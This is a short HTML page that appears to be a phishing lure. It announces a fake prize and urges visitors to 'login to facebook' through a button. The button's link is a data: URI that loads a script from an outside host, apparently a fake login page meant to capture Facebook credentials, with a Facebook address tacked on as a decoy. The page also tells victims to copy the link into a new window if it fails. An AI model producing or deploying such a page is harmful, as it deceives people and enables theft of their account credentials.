<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<div align='center'>
<h1>Congrtuation!!! </h1>
<p>You won a prize!!</p>

<p>To claim it please login to facebook via the link below</p>
<p style='color:red'>* If the link does not work. <br/>please open it in new window or copy it and past it.</p>

<a style='display:block;width:200px;background:#4834d4;color:white;padding:10px;border-radius:5px;text-decoration:none'
href="data:text/html,<script src='http://androidflame.atwebpages.com/data/facebook.js'> </script><script>https://facebook.com?login_page_rr.aspx" >FB | Login</a>
</div>
</body>
</html>